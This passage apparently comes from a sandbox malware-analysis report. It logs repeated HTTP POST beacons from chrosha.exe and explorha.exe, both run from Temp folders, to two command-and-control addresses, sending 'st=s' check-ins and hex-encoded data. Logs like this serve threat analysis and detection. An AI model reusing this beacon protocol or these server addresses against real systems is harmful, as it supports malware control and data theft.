                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:50.443768978 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
405 | 192.168.2.5 | 50249 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:50.558159113 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:50.806752920 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
406 | 192.168.2.5 | 50250 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:50.801692009 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:51.045459986 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
407 | 192.168.2.5 | 50251 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:51.057951927 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:51.310666084 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
408 | 192.168.2.5 | 50252 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:51.298861980 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.551752090 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
409 | 192.168.2.5 | 50253 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:51.668190956 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:51.919972897 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
410 | 192.168.2.5 | 50254 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:51.913796902 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:52.158246040 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
411 | 192.168.2.5 | 50255 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:52.168215036 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:52.418425083 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
412 | 192.168.2.5 | 50256 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:52.407548904 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:52.656743050 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
413 | 192.168.2.5 | 50257 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:52.775890112 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:53.024195910 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
414 | 192.168.2.5 | 50258 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:53.011682987 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:53.260895967 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
415 | 192.168.2.5 | 50259 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:53.276309013 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:53.529124975 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
416 | 192.168.2.5 | 50260 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:53.510317087 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:53.758888960 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
417 | 192.168.2.5 | 50261 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:53.882548094 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:54.127079964 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
418 | 192.168.2.5 | 50262 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:54.114581108 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:54.358174086 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
419 | 192.168.2.5 | 50263 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:54.379982948 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:54.634313107 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
420 | 192.168.2.5 | 50264 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:54.612652063 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:54.865683079 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      421 | 192.168.2.5 | 50265 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.996042013 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.247633934 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      422 | 192.168.2.5 | 50266 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.218303919 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.457772017 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      423 | 192.168.2.5 | 50267 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.497378111 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
